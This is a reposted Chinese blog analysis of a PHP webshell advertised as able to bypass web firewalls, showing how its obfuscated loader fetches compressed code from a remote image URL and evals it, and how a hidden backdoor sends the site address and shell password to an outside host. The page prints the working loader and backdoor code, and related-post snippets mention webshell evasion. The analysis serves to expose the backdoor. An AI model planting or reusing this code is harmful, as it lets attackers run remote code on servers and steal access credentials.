一次对php大马的后门的简单分析

最新推荐文章于 2021-12-01 09:00:00 发布
转载 最新推荐文章于 2021-12-01 09:00:00 发布 · 386 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/-qing-/p/10907448.html
文章标签:

#php

有人分享号称过waf的PHP大马,博主对其进行简单分析。代码中有三个变量,经ascii转字符串、加密还原后,发现其通过远程下载主力代码。起初未发现后门,后通过wget下载文件,最终在1416行解码得出后门地址。

有人分享了一个php大马(说是过waf),八成有后门,简单分析了一次

<?php
      $password='Shiqi';//登录密码(支持菜刀)
//----------功能程序------------------//
$c="chr";
session_start();
if(empty($_SESSION['PhpCode'])){
$url=$c(104).$c(116).$c(116).$c(112).$c(58).$c(47);
$url.=$c(47).$c(105).$c(46).$c(110).$c(105).$c(117);
$url.=$c(112).$c(105).$c(99).$c(46).$c(99).$c(111);
$url.=$c(109).$c(47).$c(105).$c(109).$c(97).$c(103);
$url.=$c(101).$c(115).$c(47).$c(50).$c(48).$c(49).$c(55);
$url.=$c(47).$c(48).$c(53).$c(47).$c(50).$c(49).$c(47);
$url.=$c(118).$c(49).$c(81).$c(82).$c(49).$c(77).$c(46).$c(103).$c(105).$c(102);
$get=chr(102).chr(105).chr(108).chr(101).chr(95);
$get.=chr(103).chr(101).chr(116).chr(95).chr(99);
$get.=chr(111).chr(110).chr(116).chr(101).chr(110);
$get.=chr(116).chr(115);
$_SESSION['PhpCode']=$get($url);}
$un=$c(103).$c(122).$c(105).$c(110);
$un.=$c(102).$c(108).$c(97).$c(116).$c(base64_decode('MTAx'));
@eval($un($_SESSION['PhpCode']));
?>

一共有三个变量,$url、$get、$un,首先对着几个变量ascii转成字符串,看看是什么,用echo输出即可。

就是个简单的基于base64加gzinflate加密

还原一下:

<?php
      $password='Shiqi';//登录密码(支持菜刀)
//----------功能程序------------------//
session_start();
if(empty($_SESSION['PhpCode'])){
$url = "http://i.niupic.com/images/2017/05/21/v1QR1M.gif";
$get = "file_get_contents";
$_SESSION['PhpCode']=$get($url);}
$un = "gzinflate";
@eval($un($_SESSION['PhpCode']));
?>

现在马子的路数很清楚了 通过远程下载主力代码

到这儿我们还是没发现后门,通过wget下载v1QR1M.gif改后缀txt乱码(gzinflate压缩编码本该乱码)

 

后门部分:

if(isset($_GET['login'])=='geturl'){

    @set_time_limit(10);

    $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

    $serverp = envlpass;

    $copyurl = base64_decode('SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=');

    $url=$copyurl.$serveru.'&pass='.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

function geturl(){

    @set_time_limit(10);

    $serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];

    $serverp = envlpass;

    $copyurl = base64_decode('');

    $url=$copyurl.$serveru.'&p='.$serverp;

    $url=urldecode($url);

    GetHtml($url);

}

1416行
SFRUUDovL1dXVy5GQUNFQjBPSy5DQy9lcnJvci5waHA/bmFtZT0=通过解码得出后门地址HTTP://WWW.FACEB0OK.CC/error.php?name=

 

转载于:https://www.cnblogs.com/-qing-/p/10907448.html

PHP大马后门分析
weixin_45983744的博客
01-08 3100
QQ交流群:811401950 一. PHP大马 PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。 二. 分析大马文件 打开下载的php大马,可以看出该大马...
一款免杀php大马的解密与去后门
热门推荐
暧昧倾城的专栏
02-07 1万+
<br />今天想找个php木马来管理自己的空间,但是手头没有,只好去网上找个,结果发现黑白网络有一个叫做“新版免杀php大马”的东西,于是下载了下来,我的avast果断给干掉了,尴尬 - -!好吧<br />于是关掉杀毒 ,重新下载,好吧,这是一个小插曲!、<br />刚下下来的php源文件下载在这里 http://down.qiannao.com/space/file/strivescript/share/2011/2/7/-514d-6740php-5927-9a6c_-521d-4e0b-8f7d
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
那些强悍的PHP一句话后门
weixin_30338461的博客
05-11 2045
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 ...
php大马后门分析
win176489的博客
03-31 370
php大马后门分析 分析一下手里的一个php大马,网上找的 源码是这样的 登陆后界面还是比较屌的 直接上echo 打印出这些关键变量 代码如下 输出后发现一个http的地址,还有一个危险函数file_get_contents 官方的文档如下 再继续看原来的代码 再次打印出e和e和e和d的值 这里的思路已经明朗了,它这里会请求链接的gif图片,然后通过file_get_contents函数将内容赋值给$_SESSION[‘PhpCode’] 通过迅雷下载gif图片,文件内容是如下乱码 继续查看原
PHP加密无后门大马
07-26
PHP加密无后门大马】是一个针对PHP代码的安全措施,旨在保护源代码不被轻易查看、修改或窃取。在互联网环境中,源代码的安全至关重要,尤其是对于包含敏感信息或功能强大的应用程序而言。PHP shellcode通常指的是...
php大马 webshell.zip 去后门 可能报毒
04-21
webshell,可以拿站,不过一定要清除痕迹 ,不然不要做非法用途。否则后果自负。 解压密码:php
给你的PHP大马添加后门(黑吃黑)
weixin_30915951的博客
06-23 856
Part 1 引子   说什么好呢,发个图就当个引子好了。 Part 2 XSS平台   创建项目   选择类型   xss代码   小实验,刷新代码   XSS平台上 Part 3 后门  我们写这样一个脚本 <?php $password = 'admin'; // 假设这个大...
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D盾
iphp666的博客
09-17 3504
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
最新免杀PHP大马 密码admin
06-05
最新免杀PHP大马 密码admin
PHP后门
qq_41750040的博客
03-28 1035
<?php $admin['check'] = false; $password = 'chenff';//ÉèÖÃÃÜÂë $c = "chr"; session_start(); if (empty($_SESSION['PhpCode'])) { $url = $c(104).$c(116).$c(116).$c(112).$c(58).$c(47).$c(47); $...
分析 PHP大马-php_mof SHELL
weixin_30840253的博客
06-23 759
Part 1 前言   https://www.phpinfo.cc/?post=30,这个马子,看上去满不错,我想要源码。 <?php $password = 'phpinfo';//登录密码 //----------功能程序------------------// $c = "chr"; session_start(); if (empty($_SESSION['Php...
php图片大马后门,一次php大马后门简单分析
weixin_30923925的博客
03-12 656
一次php大马后门简单分析有人分享了一个php大马(说是过waf),八成有后门简单分析一次$password='Shiqi';//登录密码(支持菜刀)//----------功能程序------------------//$c="chr";session_start();if(empty($_SESSION['PhpCode'])){$url=$c(104).$c(116).$c(116...
窥探一句话木马后门的背后
aiquan9342的博客
06-10 388
分析的木马后门: <?php $password='vae';//登录密码(支持菜刀) //----------功能程序------------------// $c="chr"; session_start(); if(empty($_SESSION['PhpCode'])){ $url=$c(104).$c(116).$c(116).$c(112).$c...
php超小免杀大马_php最新php大马免杀过狗最小1kB吗?
weixin_39688856的博客
12-20 249
谁知道这个php大马是什么加密的?听说可以过狗免杀过盾是真的吗?
解析一个PHP木马,PHP文件上传安全检测组件
Z.X的博客
12-01 8135
2021年12月1日08:43:32 前几天同事问我一个关于图片文件检测是否是脚本的问题,问题的根源就是文件上传图片,是否是隐藏的脚本问题 木马文件源码是这样的: <?php $password='phpyyds';//登录密码 //----------本程序完美支持PHP 4, PHP 5, PHP 7------------------// $c="chr"; session_sta...
php入侵检查,怀疑网站有入侵,请帮忙看看这几个PHP
weixin_29370077的博客
03-13 476
[PHP] 纯文本查看 复制代码
ruby代码审计相关关键词
课嗨教育的专栏
06-13 235
一句话过狗小马 <?php //pwd=iChina function payload($cmd,$pwd,$func) { //执行命令 if ($pwd=='c256b667c0bfd5b0cd0f0e77976a37e7') { $array = array($func,"iChina","Secquan.org"); $result = $array[0]($cmd); echo $result; } else
php大马webshell清除后门指南及安全使用提示
在本次提供的文件中,提及了一个压缩包“php大马 webshell.zip”。这个压缩包可能包含了一个用PHP编写的Webshell,并且在文件描述中提到解压密码为“php”。这类压缩包在互联网上通常被标记为恶意软件,因为它们往往...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值